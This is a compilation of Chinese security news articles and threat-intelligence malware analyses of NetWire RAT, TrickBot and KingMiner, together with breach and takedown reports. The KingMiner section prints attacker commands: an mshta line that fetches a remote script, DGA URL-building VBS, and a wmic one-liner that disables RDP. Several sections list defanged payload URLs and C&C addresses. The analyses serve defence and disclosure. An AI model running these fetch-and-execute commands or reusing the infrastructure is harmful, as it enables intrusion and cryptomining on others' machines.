感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/l9FMQq6i1nNopeVrF7X9Sw   一、背景 腾讯安全御见威胁情报中心检测到利用钓鱼邮件传播NetWire RAT变种木马的攻击活跃。攻击者将“订单询价”为主题的邮件发送至受害者邮箱，在附件中提供精心构造的利用Office漏洞（CVE-2017-8570）攻击的文档，存在漏洞的电脑上打开文档，会立刻触发漏洞下载NetWire RAT木马，中毒电脑即被远程控制，最终导致商业机密被盗。 NetWire是一种活跃多年的，公开的远程访问木马（RAT），该木马至少从2012年开始就被犯罪分子和APT组织使用。此次攻击中使用的NetWire变种采用MS Visual Basic编译，并且通过添加大量无关指令隐藏恶意代码。为了对抗分析，NetWire还会以调试模式启动自身为子进程并提取恶意代码注入。 NetWire RAT木马安装到受害系统后，会添加自身到系统启动项，搜集系统信息上传至服务器，然后接受控制端指令完成下载执行、搜集系统信息、搜集登录密码、记录键盘输入以及模拟鼠标键盘操作等行为。攻击者利用的Office漏洞（CVE-2017-8570）影响Office 2007至2016之间的多个版本。 NetWire攻击流程 二、详细分析 以咨询商品报价订单为主题的钓鱼邮件。 邮件附件是一个RTF文档RFQ# 19341005D.doc(默认用Word关联打开)，其内容被写入了人物“John Smith”的维基百科查询返回结果。而该文档实际上包含黑客精心构造的CVE-2017-8570漏洞利用代码，该漏洞影响Office2007-Office2016之间的多个版本。存在漏洞的系统上使用Office程序打开攻击文档会触发漏洞攻击，微软已在2017年7月发布该漏洞的安全更新。 打开RTF文档后，会自动释放文档中被插入的Package对象到%temp%目录，Package对象实际上是一个恶意Scriptletfile（.sct）脚本文件。 CVE-2017-8570漏洞触发成功后会直接加载文档释放到%temp%目录下的trbatehtqevyaw.ScT脚本执行，Scriptletfile启动Powershell命令下载 http[:]//www.komstrup.com/pure/zomstag.png或http[:]//www.komstrup.com/pure/zomdost.png，保存为%Temp%\zomstag.exe或%Temp%\zomdost.exe。 zomstag.exe(zomdost.exe)是公开的远程控制木马NetWire的变种，该木马至少从2012年开始就被犯罪分子和APT组织使用，是一款商业木马。 该NetWire变种是使用MS Visual Basic编译的，并且使用了多种反分析技术来对抗分析。 添加大量无关指令隐藏恶意代码。 动态地将恶意代码提取到内存中，然后跳转到目标位置执行。 NetWire添加自身到注册表的自动运行组 <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows之中，使得当受感染的系统启动时可以自动运行。 并且创建注册表<HKCU>\SOFTWARE\NetWire、<HKCU>\SOFTWARE\NetWire\HostId、 <HKCU>\SOFTWARE\NetWire\Install Date，在其中记录受害机器ID和木马安装时间。 NetWire将自己重新启动为子进程时，使用指定的DEBUG_ONLY_THIS_PROCESS标志进行重新启动，这使得父进程充当子进程的调试器，导致其他调试器无法附加到子进程，从而阻止分析员分析恶意代码细节。然后修改子进程其内存和线程的上下文数据，在线程上下文中修改OEP值，提取NetWire的真实恶意代码并覆盖子进程中的现有代码，接着在子进程中执行该代码。 NetWire创建了一个日志文件夹，用于存储从受害者系统收集的信息的日志文件，日志文件夹位于”%AppData%\Updater”。它将记录受害者的所有键盘操作、时间以及受害者所键入内容，记录的数据被编码后保存到日志文件中。 NetWire与C&C地址45.89.175.161:3501通信，搜集计算机基本信息，包括当前登录的用户名，计算机名称，Windows版本信息，当前活动的应用程序标题，计算机的当前时间，计算机的IP地址等信息发送至控制服务器，然后等待服务器返回的指令，进行以下操作： 1、获取受害者持续处于非活动状态的时间。 2、执行下载的可执行文件，或执行现有的本地文件。 3、执行以下操作：退出NetWire进程，关闭C&C服务器的套接字，从系统注册表中的Home键读取值，重置或删除指定的注册表键，删除NetWire可执行文件并重新定位其可执行文件。 4、收集受害者系统的分区和硬盘驱动器信息，获取指定文件夹中的文件信息，通过指定的文件类型获取文件信息，创建指定的目录和文件，将内容写入指定的文件，删除、重定位特定文件，以及其他与文件相关的操作。 5、窃取并收集通过不同软件存储在受害者系统中的凭证。 重点针对以下软件：360Chrome、Opera、Mozilla Firefox、Mozilla SeaMonkey、Google Chrome、Comodo Dragon浏览器、YandexBrowser、Brave-Browser、Mozilla Thunderbird、Microsoft Outlook和Pidgin。 除此之外，还会从历史记录文件夹中读取受害者的浏览器历史记录。 6、操作该文件夹中的日志文件（%AppData%\Updater）包括枚举日志文件、获取指定的日志文件属性、读取和删除指定的日志文件。 7、获取在受害者设备上创建的窗口句柄。 8、收集受害者的计算机基本信息。 9、控制受害者的输入设备，可模拟键盘和鼠标操作。 NetWire RAT控制端界面 三、安全建议 1、及时修复Office漏洞CVE-2017-8570，参考微软官方公告： https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570 2、建议不要打开不明来源的邮件附件，对于邮件附件中的文件要谨慎运行，如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描； 3、建议升级Office系列软件到最新版本，对陌生文件中的宏代码坚决不启用；版本过低的Office、Adobe Acrobat、Flash等组件的漏洞一直是黑灰产业重点攻击目标。 4、推荐企业用户部署腾讯御点终端安全管理系统防御病毒木马攻击，个人用户启用腾讯电脑管家的安全防护功能； 5、推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 45.89.175.161 MD5 13613f57db038c20907417c1d4b32d41 750de24fff5cead08836fe36ba921351 ca1e938142b91ca2e8127f0d07958913 fe24be93ce873d53338ccaa870a18684 URL http[:]//www.komstrup.com/pure/zomdost.png http[:]//www.komstrup.com/pure/zomstag.png http[:]//www.komstrup.com/pure/zomebu.png 参考链接： https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing.html

据外媒CNET报道，近日安全研究人员发现了一个不安全的数据库，其中泄露了超过2.67亿个Facebook用户的电话号码、姓名和用户ID，任何人都可以在线访问该数据库。这可能成为继续困扰着世界上最大的社交网络的又一起隐私和安全事故。 安全研究员Bob Diachenko于12月14日发现了这批Facebook用户数据。该数据库（目前已被关闭）并未受到密码或任何其他保护措施的保护。尽管该数据库现已无法访问，但是在安全研究人员发现时，这些信息已经被公开了将近两个星期。根据  Comparitech的说法，有人已经在一个黑客论坛上获得了可供下载的数据。 Facebook最新的隐私事故引发了有关该公司是否在保护其数十亿用户数据方面所做的足够的质疑。这也再次提醒用户，用户应警惕他们在社交网络上公开的信息。这不是安全研究人员首次发现一个包含大量Facebook用户数据的数据库。此前英国政治咨询公司剑桥分析公司被曝光未经其许可就收集了多达8700万Facebook用户的数据。 Facebook 还面临其他隐私问题，例如以纯文本格式存储数亿个密码。 Comparitech表示，公开的Facebook数据使用户面临垃圾邮件和网络钓鱼活动的风险。Facebook用户ID包含唯一数字，可用于找出某人的Facebook用户名和其他个人资料信息。 Diachenko认为越南的犯罪分子通过两种可能的方式获得了用户记录。他们本可以利用Facebook的应用程序编程接口或API，使开发人员可以访问其朋友列表，照片和群组等数据。由于可能存在安全漏洞，这可能是在Facebook在2018年或之后限制访问用户电话号码之前发生的。犯罪分子还可以使用自动化技术从公开的Facebook个人资料中获得信息。 Diachenko在一封电子邮件中表示，链接到数据库的欢迎页面包括越南语邀请，要求输入登录名和密码。他表示，该数据库似乎被错误地设置为公开数据库，因为“没有充分的理由公开此数据。” 一位Facebook发言人在一份声明中说，该公司正在调查该问题，但认为该数据可能是在进行更改以更好地保护用户信息（例如限制访问电话号码）之前收集的。安全研究人员指出，用户可以更改隐私设置，以使Facebook之外的搜索引擎无法链接到他们的个人资料。用户还可以停用或删除他们的Facebook帐户。 不受保护的公共数据库一直是Facebook的问题。4月，来自UpGuard的安全研究人员在亚马逊云服务器上的公共数据库中发现了超过5.4亿个Facebook用户记录，包括评论和点赞。9月，TechCrunch报告称一个服务器包含多个数据库，其中包括来自美国、英国和越南用户的超过4.19亿个Facebook记录。不过，Facebook表示，该服务器包含大约2.2亿条记录。Diachenko称，最新遭泄露的公开数据库包含相似的Facebook用户数据，但并不相同。 9月，另一位安全研究人员发现了一个类似的数据库，其中包含Facebook用户数据。目前尚不清楚是否是同一个人或团体在网上发布Facebook用户信息。   （稿源：cnBeta，封面源自网络。）

一周前，新奥尔良市官员在新闻发布会上确认该市受到勒索软件攻击，攻击事件发生于2019年12月13日上午。 IT人员立即通知所有了员工，并要求他们关闭计算机，以防威胁扩散。 政府部门的设备没有连接城网，当时还没查出是那种勒索软件感染了系统。 现在，媒体提供了有关这次攻击的更多消息。根据提交给VirusTotal的文件，新奥尔良市涉及的勒索软件可能是Ryuk Ransomware。 在勒索软件攻击新奥尔良市的第二天，2019年12月14日，可疑的内存转储 可执行文件 已从美国的IP地址上传到VirusTotal。 “Red Flare Security的Colin Cowie 发现其中一个内存转储多次提及了New Orleans 和 Ryuk” BleepingComputer报道。 Cowie发现的转储与名为yoletby.exe，其中包含对新奥尔良市的引用，包括域名，域控制器，内部IP地址，用户名，文件共享。同一转储包含对Ryuk勒索软件的引用，这种情况表明黑客在此次袭击中使用了该恶意软件。   专家还发现了证明此次攻击使用了Ryuk的证据。   “ v2.exe内存转储中有一个字符串很有意思，它指向的值是新奥尔良市政厅。” “经过进一步挖掘， BleepingComputer 找到了 v2.exe可执行文件，并在执行后确认它是Ryuk勒索软件。”     消息来源：SecurityAffairs， 译者：r4938n，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

据外媒报道，最近，Visa在一个安全警报中强调了正在持续发生的POS系统攻击及针对加油站加油泵的数据盗取问题。Visa欺诈部门在一起事件披露，一名恶意行动者利用发给一名商户职工的钓鱼邮件在该商户的网络上安装了一个远程访问木马，然后通过横向移动到销售点环境的方式安装了一个RAM scraper来收集支付卡数据。 资料图 在另一起事件中，Visa也发现了类似的行为–一名黑客入侵目标网络、进入POS环境窃取银行卡数据。Visa指出，在这一事件中，该名黑客专门追踪发生在加油站的磁条交易数据。该公司认为一个叫为FIN8的网络犯罪组织可能是这次攻击的幕后黑手。 此外，Visa还提到了针对北美酒店商户的第三起网络攻击。虽然该攻击并没有专门针对加油站，但信用卡运营商表示，FIN8有可能在未来的攻击中利用这次攻击的恶意软件攻击加油站。   （稿源：cnBeta，封面源自网络。）

施耐德电气公司近期解决了Modicon M580，M340，Quantum和Premium控制器中的DoS漏洞，并表示这三个缺陷都是由于检查不当造成的。 这三个漏洞是： 第一个是CVE-2019-6857，CVSS v3.0 的基本评分为 7.5，具有高危险性。使用Modbus TCP读取特定的存储器块时，该漏洞可能导致控制器遭遇DoS攻击。 CVE-2019-6856，CVSS v3.0 评分同样为 7.5，具有高危险性。在使用Modbus TCP编写特定的物理内存块时可能会导致DoS 攻击。 第三个漏洞编号为CVE-2018-7794，CVSS v3.0 评分为 5.9，为中度危险。当使用Modbus TCP读取的数据的索引无效时，该漏洞可能导致DoS攻击。 来自Nozomi Networks的Mengmeng Young和Gideon Guo（CVE-2019-6857），Chansim Deng（CVE-2019-6856）和Younes Dragoni（CVE-2018-7794）已报告了漏洞。 施耐德还告知其用户，EcoStruxure下有三个产品（ Power SCADA Operation 的电源监控软件等）出现了多个漏洞。 根据Applied Risk的报告，漏洞源于一个严重堆栈溢出漏洞，黑客可以利用该漏洞触发DoS。 报告还指出：“Schneider ClearSCADA出现了一个文件权限引发的漏洞。黑客由此可以修改系统配置和数据文件。” 施耐德电气还发现了EcoStruxure Control Expert编程软件中的一个中级漏洞（该软件为Modicon可编程自动化控制器提供服务），该漏洞可能使黑客绕过软件与控制器之间的身份验证过程。     消息来源：SecurityAffairs， 译者：r4938n，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/nh-j3Zv1DTVg_xkIsjlLMQ   一、背景 腾讯安全御见威胁情报中心检测到TrickBot银行木马活跃，黑客在钓鱼文档中嵌入恶意VBA代码，宏代码通过创建和执行CMD脚本以及VBS脚本下载和传播银行木马TrickBot。监测数据显示，该木马已影响我国部分企业，中毒电脑系统信息及访问国外银行的登录信息会被窃取，受TrickBot银行木马影响较严重的地区为浙江，广东，北京等地。 TrickBot在2016年左右被发现，会在受害者通过浏览器访问在线银行时窃取网银信息，攻击目标包括澳大利亚、新西兰、德国、英国、加拿大、美国、以色列和爱尔兰等国银行系统，有国外研究者认为该组织已收集了2.5亿个电子邮箱。 TrickBot首次感染系统后，会安装计划任务“Ms visual extension”反复执行木马，然后将恶意代码注入Svchost.exe，下载多个加密的DLL模块，最终将injectdll32(64)注入浏览器进程，捕获与目标银行相关的HTTP请求并复制发送至C&C服务器。 TrickBot攻击流程 二、详细分析 当受害者打开恶意Word文档时，会显示如下图所示界面： 初次打开文档时，Office会提示是否允许宏执行，若选择允许，则文档界面中会提示一条告警消息，但是实际上后台VBA代码正在C:\Resources目录下创建5个后缀为.cmd的文件，然后通过CreateProcessA执行c:\Resources\BC4603BB450B14.cmd。 之后，BC4603BB450B14.cmd创建用于下载文件的VBS脚本pscolor.vbs， 并使用该脚本从https[:]//allpetsandpaws.com/DOYJIABZB.res或 http[:]//rygseminarios.com/egprod40.eof下载nas6.exe。 nas6.exe搜集当前系统CPUID序列号发送至https[:]//magnwnce.com/photo.png?id=，然后从http[:]//149.154.67.19/tin.exe下载Trickbot。 Trickbot重命名自身为“с그의길습을든意すスっジюл.EXE”，并拷贝到%ProgramData%和%Roaming%\swapper\目录下。重命名的文件名包含字母，韩文，中文，日文和保加利亚语，这会导致部分调试器无法加载该文件。 接着将木马安装为计划任务“Ms visual extension”，设置触发器在系统启动时木马执行一次，之后每隔11分钟执行一次。 定时任务触发后，taskeng.exe启动с그의길습을든意すスっジюл.EXE，然后将恶意代码注入子进程svchost.exe继续执行，进程树如下图所示。 TrickBot下载8个模块importDll64(或importDll32) ，injectDll64，mshareDll64，mwormDll64，networkDll64，pwgrab64，systeminfo64，tabDll64。同时下载所需配置文件存放到四个目录injectDll64_configs，networkDll64_configs，pwgrab64_configs，tabDll64_configs下。 systeminfo64负责收集受害者的系统信息，包括其Windows版本、CPU类型、RAM容量、用户帐户、已安装的软件和服务，不同信息字段以符号“aksgja8s8d8a8s97”进行分割并上传至服务器。 injectDll64最终能够将恶意代码注入Web浏览器(IE、Chrome和Firefox)从而窃取受害者的在线银行信息。被注入到svchost.exe执行时，injectDll64会枚举所有正在运行的进程，通过比较进程名来检查它是否是浏览器(包括“Chrome”、“IE”和“Firefox”浏览器)。 在选择一个进程之后，它创建一个命名管道(使用进程ID与一个常量字符串进行组合作为管道的名称)，使用这个命名管道在svchost.exe和浏览器之间进行通信，以传输Sinj、dinj和dport的内容，之后InjectDll准备要注入到浏览器中的代码，并调用CreateRemoteThread执行注入。 TrickBot在一个线程中将银行信息(即Sinj、dinj和dpost的内容)传输到浏览器，之后在另一个线程中对WinInet和NSS3API的导出函数上设置钩子，从而利用注入的代码捕获来自浏览器的所有HTTP请求。 本地钩子函数能够使用银行信息对HTTP请求进行进一步的过滤，如果HTTP请求与目标银行匹配，则将该HTTP请求复制并发送到C&C服务器。 三、安全建议 中国国内在线银行系统普遍采用“U盾”来做登录认证、加密网银系统通信，TrickBot银行木马暂不能直接威胁国内网银资金安全，但对于国外银行系统的安全威胁却不容小视。腾讯安全专家建议用户采取以下安全措施，防止受害： 1、建议不要打开不明来源的邮件附件，对于邮件附件中的文件要谨慎运行，如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描； 2、建议升级office系列软件到最新版本，对陌生文件中的宏代码坚决不启用； 3、推荐企业用户部署腾讯御点终端安全管理系统防御病毒木马攻击，个人用户启用腾讯电脑管家的安全防护功能； 4、推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统; IOCs IP 149.154.67.19 181.129.104.139 170.238.117.187 Domain allpetsandpaws.com rygseminarios.com URL https[:]//allpetsandpaws.com/DOYJIABZB.res http[:]//rygseminarios.com/egprod40.eof http[:]//149.154.67.19/tin.exe http[:]//presifered.com/data3.php md5 c04f5dc534fa5b1acef3c08d9ab3f3cb 1c132ca1ec8b89977c0e3ee28763e3fc 参考链接： https://www.fortinet.com/blog/threat-research/deep-analysis-of-the-online-banking-botnet-trickbot.html https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/（原文已被删，快照可供参考）  

欧洲刑警组织于上周宣布，他们在近期的一项国际执法行动中成功打击了Imminent Monitor RAT背后的犯罪网络。 Imminent Monitor RAT是一种可以让网络犯罪分子远程完全控制受害者的计算机的工具，被卖给了14,500多名买家，受害者覆盖124个国家。 此次行动还关闭了Imminent Monitor的基础架构和销售网站，这使得新老买家都无法使用该木马。 该黑客工具一开始被作为一种合法的远程管理框架而推广，随后被广泛用于访问用户的计算机，使得黑客得以窃取用户的在线银行和其他金融帐户的登录信息。 欧洲刑警组织还于今年6月对澳大利亚和比利时的IM-RAT开发商和雇员签发了搜查令，此次行动很有可能是为了确认该工具的转售者和用户。刑警组织还在澳大利亚，哥伦比亚，捷克，荷兰，波兰，西班牙，瑞典和英国逮捕了IM-RAT的13个重要客户。 执法人员还从客户手中缉获了430多种设备，并对大量计算机和IT设备进行了分析。 IM-RAT可以使攻击者完全控制受害者的计算机，从而使他们可以在受害者不知情的情况下执行以下所列的各种恶意行为： 1.记录击键， 2.从浏览器中窃取数据和密码， 3.通过网络摄像头监视受害者， 4.下载/执行文件， 5.禁用防病毒和防恶意软件， 6.终止正在运行的进程， 7.执行许多其他操作。 由于IM-RAT的功能，易用性以及终身访问权限，其成本仅为25美元，因此被评定为危险级别。 欧洲刑警组织欧洲网络犯罪中心（EC3）负责人史蒂文·威尔逊说道：“地球另一端的黑客现在只用花25美元就可以通过点击鼠标，访问我们的个人详细信息和亲人的照片，甚至监视我们。” 执法人员认为，IM-RAT受害者的数量下降了数万人，“调查人员已经取得了黑客窃取个人详细信息，密码，私人照片，录像带和数据的犯罪证据”。 在其他类似的国际联合行动中，名为Luminosity Link的远程访问木马的犯罪网络也于两年前被关停。 在Luminosity Link案中，一名21岁开发人员因非法使用计算机，洗钱和非法转移财产而被捕，并被判处 30个月监禁。 为避免成为此类威胁的受害者，我们建议个人用户和组织使您的所有软件升级至最新版本，正确配置防火墙，避免打开可疑的电子邮件附件或URL，并在不同网站上使用不同的密码。   消息来源：TheHackerNews， 译者：r4938n，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

在线音乐流媒体服务Mixcloud最近遭到黑客的攻击，用户数据在暗网上出售。 近期，一名昵称为“ A_W_S”的黑客联系了多家媒体曝光了此事件，并提供了数据样本作为数据泄露的证据。 此次攻击发生在11月初，超过2000万个用户帐户的数据遭到曝光。这些数据包括用户名，电子邮件地址，SHA-2哈希密码，帐户注册日期和国家/地区，最近一次登录日期，IP地址以及个人资料照片的链接。 Techcrunch发布的文章称：“我们通过注册功能验证了部分被盗数据。这些被盗数据的确切数量仍是未知。卖方说他们拥有2000万条记录，但暗网上存在2100万条。但根据我们采样的数据，记录可能多达2200万条。” 黑客以0.27比特币（约合2,000美元）的价格出售这些数据。 图片来源：ZDNet   上周六，Mixcloud发布安全公告披露了该事件，该公司同时强调，系统没有存储完整的信用卡号或邮寄地址之类的数据。 “今天晚上我们收到了可信的报告，证实了黑客访问了我们的部分系统。” “此次事件事件涉及电子邮件地址，IP地址和少数用户的密码（安全加密状态）。大多数Mixcloud用户使用Facebook账号进行了注册，我们没有存储这些用户的密码。” Mixcloud 目前正在积极调查此事件，并且建议用户将密码重置。   消息来源：SecurityAffairs， 译者：r4938n，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

如果你曾经在Magento官方市场上注册过一个帐户来购买或出售任何扩展程序，插件或电子商务网站主题，那么你现在要立刻修改你的密码了。 拥有Magento电子商务平台的公司Adobe今天公布了一项新的数据泄露事件，Magento Marketplace 用户的帐户信息被暴露给了黑客。 据该公司称，黑客利用了其网站上一个未公开的漏洞，并用未经授权的第三方身份访问数据库并获取了注册用户的信息，包括客户（买方）和开发人员（卖方）。 数据库中的信息包括受影响的用户的姓名，电子邮件地址，MageID，账单和送货地址信息以及一些商业信息。 尽管Adobe没有透露或者可能他们也不知道Magento市场何时遭到的攻击，但该公司已经确认其安全团队于11月21日发现了这一漏洞。 除此之外，Adobe还保证，黑客无法破坏Magento的核心产品和服务，也就是说黑客无法通过访问Marketplace上托管的主题和插件来添加任何后门或恶意代码，用户可以安全下载。 “ 11月21日，我们发现了Magento Marketplace的漏洞。我们当时暂时关闭了Magento Marketplace以解决此问题。目前Marketplace已经重新上线。此次事件并未影响任何Magento核心产品或服务的运行” ，Adobe商务产品和平台副总裁Jason Woosley 发表声明说。 Adobe没有透露受影响的用户和开发人员的数量，但它已经开始通过电子邮件通知受影响的客户。 尽管Adobe并未明确提及帐户密码也已泄露，但他们仍然建议用户更改该密码，如果用户在其他网站使用了相同的密码，最好也对这些密码进行更改。   消息来源：TheHackerNews， 译者：r4938n，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/ZothuAaH-r1xH6HFUbz–A   一、背景 腾讯安全御见威胁情报中心检测到KingMiner变种攻击，KingMiner是一种针对Windows服务器MS SQL进行爆破攻击的门罗币挖矿木马。该木马最早于2018年6月中旬首次出现，并在随后迅速发布了两个改进版本。攻击者采用了多种逃避技术来绕过虚拟机环境和安全检测，导致一些反病毒引擎无法准确检测。 当前版本KingMiner具有以下特点： 1.针对MSSQL进行爆破攻击入侵； 2.利用WMI定时器和Windows计划任务进行持久化攻击； 3.关闭存在CVE-2019-0708漏洞机器上RDP服务，防止其他挖矿团伙入侵，以独占服务器资源挖矿； 4.使用base64和特定编码的XML、TXT、PNG文件来加密木马程序； 5.利用微软和多个知名厂商的签名文件作为父进程，“白+黑”启动木马DLL。 根据腾讯安全御见威胁情报中心统计数据，KingMiner影响超过一万台电脑，其中受影响最严重的地区为广东、重庆、北京、上海等地。 二、详细分析 KingMiner在MS SQL爆破入侵成功后，首先执行一段VBS脚本(tl.txt/vk.txt)，检测操作系统版本，并根据不同的系统版本下载不同的Payload文件，利用下载的文件进行提权以及门罗币挖矿。同时还会安装WMI定时器和Windows计划任务来反复执行指定脚本，执行服务器返回的恶意代码达到持久化攻击的目的。 KingMiner变种攻击流程 提权 vk.txt从http[:]// w.30713fdae.tk/32tl.zip下载经过base64编码的二进制blob文件，经过解码后保存为C:\Users\Public\Downloads\<random>\tool.exe tool.exe利用Windows权限提升漏洞CVE-2019-0803进行攻击，成功利用此漏洞的攻击者可以在内核模式下运行任意代码，然后可以安装程序；查看、更改或删除数据；或创建具有完全用户权限的新帐户。 tool.exe在特权模式下执行命令 mshta.exe vbscript:GetObject(\"script:http[:]//aa.30583fdae.tk/r1.txt\")(window.close) 通过mshta.exe执行脚本r1.txt来进行持久化。 持久化 计时器（每15分钟执行一次VBS脚本） r1.txt配置名为WindowsSystemUpdate _WMITimer的计时器，并将执行一段脚本代码的事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate_filter绑定到计时器，从而通过计时器每15分钟执行一次下面的VBS脚本代码： 这段VBS代码根据不同情况采取两种方法生成URL，接着通过访问生成的URL下载第二阶段的Payload运行。 1.URL由IP地址转化为ASCII后拼接而成 脚本运行nslookup命令查询C&C域名news.g23thr.com的DNS记录，当news.g23thr.com解析的IP地址为xxx.xxx.xxx.120，则访问URL “http://”+chr(xxx)+chr(xxx)+chr(xxx)+”xfghh.com/mgxbox.txt” 2.URL由与时间相关的DGA域名拼接而成 当查询DNS返回IP不符合指定格式，则DGA域名通过当前时间的年、月、日、分钟、秒数值计算得到，算法如下： u =(hex((year(now())-2000)&Month(now())&(day(now())\7)&(year(now())-2000)))&"fdae.tk"url = "http://"&minute(now())&second(now())&"."&u&"/mgxbox.txt" 计划任务 r1.txt通过RegisterTaskDefinition创建名为WindowsMonitor的计划任务，每15分钟执行一次如下脚本；或者安装触发条件为系统启动的计划任务WindowsHelper，并在WindowsHelper触发后再次安装WindowsMonitor定时任务执行同一段脚本： 计划任务最终执行的脚本如下： 计划任务执行的VBS脚本与WMITimer执行的脚本类似，通过DNS查询返回的数据，或者获取时间转换后生成的DGA域名拼接URL，执行访问URL后返回的代码。 url=“http://”+chr(xxx)+chr(xxx)+chr(xxx)+”xfghh.com/pow.txt” 或者 u =(hex((year(now())-2000)&Month(now())&(day(now())\7)&(year(now())-2000)))&"fdae.tk"url = "http://"&minute(now())&second(now())&"."&u&"/pow.txt" 当前访问url返回的代码如下： CreateObject("WScript.Shell").Run "cmd /c ver |findstr ""5.0 5.1 5.2 6.0 6.1""&&wmic qfe GET hotfixid |findstr /i ""kb4499175 kb4500331 KB4499149 KB4499180 KB4499164""||wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0",0,False 返回代码的功能为： 获取计算机版本，并判断计算机版本是否受CVE-2019-0708漏洞的影响，且计算机是否安装特定补丁(kb4499175、kb4500331、KB4499149、KB4499180、KB4499164为微软发布的CVE-2019-0708远程桌面服务远程代码执行漏洞的补丁号)。 如果没有安装补丁，则修改设置禁止其他机器通过远程桌面服务访问本机，通过这种方式来阻止其他木马进入系统，从而达到独占挖矿资源的目的。 挖矿 vbs脚本tl.txt从http[:]// w.30713fdae.tk/32a1.zip下载经过base64编码的二进制blob文件。 文件解码并解压后保存至C:\Users\Public\Downloads\<random>\目录下，其中<random>为取当前时间“年月日时分秒”格式生成的字符。 alger.exe为微软系统文件credwiz.exed，功能描述为Credential Backup and Restore Wizard(凭据备份和还原向导)，该程序在启动后自动加载系统DLL文件duer.dll并调用其导出函数InitGadgets()。 除了微软系统文件外，KingMiner在挖矿木马的“白+黑”启动过程中还利用了多个知名公司的含数字签名的文件来逃避杀软检测，利用正常的有数字签名的白文件来调用恶意dll。 目前发现的包括以下数字签名的文件被利用： “GuangZhou KuGou Computer Technology Co.,Ltd.” “Google Inc” “福建创意嘉和软件有限公司” 32a1.zip/64a1.zip解压后在同一目录下释放受信任的系统文件alger.exe（credwiz.exed）和恶意的duer.dll，利用alger.exe加载duer.dll并调用其导出的InitGadgets()，从而在InitGadgets()中解密保存在同目录下的x.txt或x/y/z.png中的XMRig挖矿程序代码，并启动门罗币挖矿过程。 三、安全建议 我们建议企业针对KingMiner挖矿木马的技术特点采取针对性的防御措施： 1.根据微软官方公告修复特权提升漏洞CVE-2019-0803： https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803 2、加固SQL Server服务器，修补服务器安全漏洞。使用安全的密码策略，使用高强度密码，切勿继续使用弱口令，特别是sa账号密码，防止黑客暴力破解。 3、修改SQL Sever服务默认端口，在原始配置基础上更改默认1433端口设置，并且设置访问规则，拒绝1433端口探测。 4、企业用户可在服务器部署腾讯御点终端安全管理系统，从而防范此类攻击。 5、推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。（https://s.tencent.com/product/gjwxjc/index.html） 腾讯御界检测到针对SQL服务器的爆破攻击 IOCs @KingMiner IP 107.154.161.209 107.154.158.39 Domain q.112adfdae.tk q.30583fdae.tk aa.30583fdae.tk w.30713fdae.tk a.1b051fdae.tk news.g23thr.com a.qwerr.ga w.ddff1.tk Md5 duser.dll 20e502ff977b336d9e7785186b16c68a 78b56b92c2e7a42520fb99a84d78cf92 active_desktop_render_x64.dll 21048ff02894656b5b24d4ed3c8a2882 goopdate.dll 7def058c5d2acb660f394d04b4698580 soundbox.dll 88a5c4645c2a9d0481fd0a846e49b773 64tl.zip be45959bc043a4fe88351cd03289f240 64a1.zip 4d910cb71c2f55bde48521f7ae062da4 32a1.zip 465373b74d163028add70f0d2b0966d0 23ef4da80f6985a78c4a59467ac4612f 32tl.zip e09947875b4722aab067c4d0c4b30384 r1.txt 21cb01553d92bee4fefc0069db1fd5ea c568d6028735cdc2a1ddd3c01f14ca80 tl.txt b0ab674b842822358be8cd5f6dc91554 vk.txt e3accf5a6f58932e56192bfbcbf0804c c874dbb6bf3664990b57d07d7d220ee6 n.txt 2b702a22963448c164db26807a308d50 pow.txt/mgxbox.txt 03d24675d4de12bcd076e7eff213a8a4 htak.txt 5fd47b2be01004e41290bf7658c7ad5a tool.exe 4899762134c0d2d8fbbaecc289a0c74e URL http[:]//4056.309cffdae.tk/vk.txt http[:]//3023.309cffdae.tk/vk.txt http[:]//5311.1d28ebfdae.com/pow.txt http[:]//3843.1d28ebfdae.com/pow.txt http[:]//5921.1d28ebfdae.com/mgxbox.txt http[:]//ww33.3096bfdae.com/32a1.cab http[:]//ww33.3096bfdae.com/64a1.cab http[:]//a.qwerr.ga/32a.zip http[:]//a.qwerr.ga/64f.zip http[:]//aa.30583fdae.tk/r1.txt http[:]//aa.30583fdae.tk/tl.txt http[:]//aa.30583fdae.tk/r1.txt http[:]//q.30583fdae.tk/32tl.zip http[:]//q.30583fdae.tk/64tl.zip http[:]//q.30583fdae.tk/64a1.zip http[:]//q.30583fdae.tk/32a1.zip http[:]//w.30713fdae.tk/vyk.txt http[:]//w.30713fdae.tk/64a1.zip http[:]//w.30713fdae.tk/32a1.zip http[:]//w.ddff1.tk/32a1.zip http[:]//w.ddff1.tk/64a1.zip 矿池： 